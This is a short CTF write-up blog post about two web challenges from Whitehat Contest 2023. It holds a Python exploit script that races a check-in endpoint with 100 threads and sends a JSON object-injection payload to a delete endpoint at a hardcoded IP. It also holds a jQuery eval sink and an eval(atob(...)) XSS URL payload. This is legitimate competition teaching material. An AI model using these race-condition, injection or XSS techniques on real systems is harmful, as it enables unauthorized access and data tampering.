Post

Whitehat Contest 2023

Posted
By whgsuwo 1 min read

Information

Team name: YouAreMyUniverse
Rank: 3rd place

Write up

web/atten-dance

Desc

Get first flag with race condition attack,
Get second flag with sql injection ( Json injection )

Exploit

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28

import requests
import threading
import time

url = 'http://13.209.18.49:3000'

# Flag 1

requests.get(f"{url}/join", params={"username": "dummy"})
time.sleep(1)

def worker(thread_num):
    requests.get(f"{url}/check", params={"username": "dummy"})

threads = []

for i in range(100):
    thread = threading.Thread(target=worker, args=(i,))
    threads.append(thread)
    thread.start()

res = requests.get(f"{url}/claim", params={"username": "dummy"})
print(res.text)

# Flag2

res = requests.post(f"{url}/del", json={"username": {"contains": "a"}})
print(res.text)

web/oshinolist

Desc

XSS with eval

1
2
3
4
5
6
7
8
9
10

// File: CustomPlayer.js

$("video[id*=video_]").on("loadeddata", function () {
    const selected_id = $(this).attr("id").replace("video_", "");
    if ($("#source_" + selected_id).length == 0) {
        try {
            eval(`type_${selected_id}()`);
        } catch (e) { }
    }
});

Exploit

1

?urls=https://video.mp4,https://video.mp4?a.a:eval(atob("payload"))

Comment

It was Fun and Helpful CTF with Good quality Wargame.
I’m happy to have won third place, and I am thankful to the team members.

CTF
Write up
This post is licensed under CC BY 4.0 by the author.

Trending Tags

Write up